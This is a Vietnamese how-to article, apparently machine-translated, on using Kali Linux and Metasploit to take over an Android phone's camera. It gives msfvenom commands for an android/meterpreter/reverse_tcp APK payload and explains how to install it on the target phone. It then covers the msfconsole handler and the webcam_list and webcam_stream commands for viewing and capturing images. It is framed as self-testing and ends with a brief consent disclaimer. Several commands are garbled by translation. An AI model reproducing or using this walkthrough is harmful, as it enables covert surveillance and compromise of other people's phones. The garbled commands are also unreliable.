Đã có một số tin tức về việc tin tặc chiếm quyền điều khiển máy ảnh Android để lắng nghe người dùng của họ hoặc cung cấp cho họ hình ảnh giả mạo. Là chủ sở hữu điện thoại cảnh báo, bạn có thể ngăn chặn điều này bằng cách đánh giá khả năng và rủi ro thực sự của sự kiện đe dọa đó.
Kali Linux là một trong những công cụ tốt nhất để kiểm tra các lỗ hổng tiềm năng của máy ảnh Android của bạn thông qua kiểm tra thâm nhập. Nó có thể giúp bạn đứng đầu trong tất cả các nỗ lực hack để có quyền truy cập từ xa vào camera điện thoại của bạn.
Cài đặt tải trọng
Để sử dụng Kali Linux cho bài kiểm tra thâm nhập, trước tiên hãy tải xuống từ nó trang web chính thức. Xem hướng dẫn trước đó để biết định nghĩa của các thuật ngữ khác nhau, ví dụ: "msfvenom", "msfconsole", "métpreter" và nhiều thứ khác sẽ được sử dụng trong bài tập này.
Bước đầu tiên trong thử nghiệm thâm nhập là cài đặt tải trọng tiêu chuẩn trên thiết bị. Để thực hiện việc này, hãy mở terminal Kali Linux và nhập lệnh sau: ifconfig. Điều này sẽ cung cấp cho bạn địa chỉ IP của phiên Kali Linux của bạn.
Bây giờ nhập lệnh hiển thị bên dưới với địa chỉ IP ở trên. Số cổng khai thác, Trojan và các lỗ hổng khác thường được liệt kê là 4444.
msfvenom – p android/Meterpreter/Reverse_tcp L HOST = địa chỉ IP LPORT = Số R > Payload.apk
Trong bước này, bạn cố gắng chèn một tải trọng metasploit, dựa trên trình thông dịch Java. Nếu thành công, kiểm tra thâm nhập sẽ giúp bạn xác minh xem điện thoại của bạn có dễ bị ai đó nghe cuộc gọi điện thoại, truy cập SMS, định vị địa lý người dùng, v.v.
Trong trường hợp này, nỗ lực là chỉ ra cách khai thác có thể được sử dụng để truy cập vào các camera của điện thoại.
Khi quá trình khai thác đã được bắt đầu, một tệp APK có tên "Tải trọng" sẽ được cài đặt trong thư mục gốc. Bạn cần cài đặt nó trên điện thoại Android mục tiêu. Nhưng nói thì dễ hơn làm. Hầu hết các điện thoại và email mới hơn của Android đều từ chối mang các tệp bị nhiễm như vậy với phần mềm độc hại và điều đó tốt.
Nhưng nó vẫn có thể đạt được thông qua cáp USB hoặc các tệp tạm thời. Nếu một hacker có quyền truy cập vào điện thoại của bạn trong vài phút, điều đó làm cho nó có phần dễ bị tổn thương. Công việc của chúng tôi ở đây trong thử nghiệm thâm nhập này là xác định mức độ chính xác của rủi ro.
Sau khi chuyển, bạn phải tìm cách cài đặt tệp tải trọng trên điện thoại của mình. Nếu đó không phải là phiên bản Android quá cũ, điện thoại của bạn sẽ đưa ra một vài cảnh báo trước khi APK có thể được cài đặt. Bất kể phiên bản của điện thoại Android, có nhiều cách khác để cài đặt ứng dụng từ các nguồn không xác định trong điện thoại Android.
Ra mắt khai thác
Để bắt đầu sử dụng tải trọng trên, hãy nhập lệnh sau: msfconsole. Chỉ mất vài giây để lệnh chạy và metasploit có thể được đọc để kiểm tra thâm nhập thêm trên máy ảnh của điện thoại.
Các metasploit sẽ cung cấp mô tả đầy đủ của riêng mình. Thành phần của tải trọng cũng có thể nhìn thấy. Nó cho thấy số lượng khai thác tại nơi làm việc.
Trong bước tiếp theo, msfconsole đã sẵn sàng để bắt đầu khai thác. Đối với điều này, xem địa chỉ IP và số cổng (4444) đã thảo luận trước đó. Theo đó, nhập các lệnh sau:
khai thác (đa / xử lý)> đặt LHOST "Địa chỉ IP" (ENTER) đặt LANCE "Số cổng" (ENTER) khai thác (ENTER)
Khi Trình quản lý TCP đảo ngược được bật, bạn sẽ thấy các bước khác nhau trong Trình thông dịch đồng hồ bắt đầu. Đợi vài giây trong khi chẩn đoán điện thoại mục tiêu.
Cần phải đề cập ở đây rằng hầu hết các điện thoại Android hiện đại tiếp tục từ chối quyền truy cập này. Hãy nhớ rằng, đây là một bài kiểm tra thâm nhập. Nếu điện thoại Android của bạn không thể bị xâm nhập bằng tệp APK chết người này, điều đó có nghĩa là nhà sản xuất điện thoại của bạn biết về vectơ tấn công này.
Truy cập vào camera điện thoại Android
Nếu bạn quản lý để chèn khai thác vào điện thoại, có khả năng bây giờ nó có thể bị xâm nhập. Khi điều này xảy ra, "đồng hồ đo" trên thiết bị đầu cuối Kali Linux có thể thiết lập kết nối với điện thoại. Hiện tại, triển khai trợ giúp để truy cập nhiều tùy chọn trong điện thoại Android đang bị tấn công.
Nhập các lệnh sau (từ menu trợ giúp) để truy cập các camera trên điện thoại của bạn. Trong việc sử dụng này, một nỗ lực đã được thực hiện để truy cập vào camera phía sau để chụp ảnh từ thiết bị đầu cuối.
webcam_list (ENTER) 1. Camera lùi 2. Camera trước (ENTER) webcam_stream -i 1
Để thực hiện kiểm tra thâm nhập thành công, hãy chụp ảnh và lưu nó trong thư mục gốc Kali Linux sau khi truy cập máy ảnh. Bạn cũng có thể chỉnh sửa, đổi tên hoặc xóa các hình ảnh khác được lưu trữ. Do đó, mọi sự thâm nhập thành công trên điện thoại được thử nghiệm là một hồi chuông cảnh tỉnh về khả năng xảy ra một cuộc tấn công thực sự, điều đó có nghĩa là đã đến lúc phải cập nhật bảo mật.
Trong hướng dẫn này, bạn sẽ tìm hiểu cách có thể truy cập máy ảnh Android từ thiết bị đầu cuối Kali Linux để kiểm tra thâm nhập.
Đây là một bài viết nghiên cứu an toàn. Nếu bạn mở máy ảnh của người khác để trình diễn, bạn luôn phải xin phép họ trước, nếu, tất nhiên, đó không phải là điện thoại của chính bạn. Đừng quên kiểm tra các ứng dụng hack Android này để bạn có thể kiểm tra và tìm lỗ hổng trong điện thoại của mình
Đọc tiếp:
Bài viết này có hữu ích không?
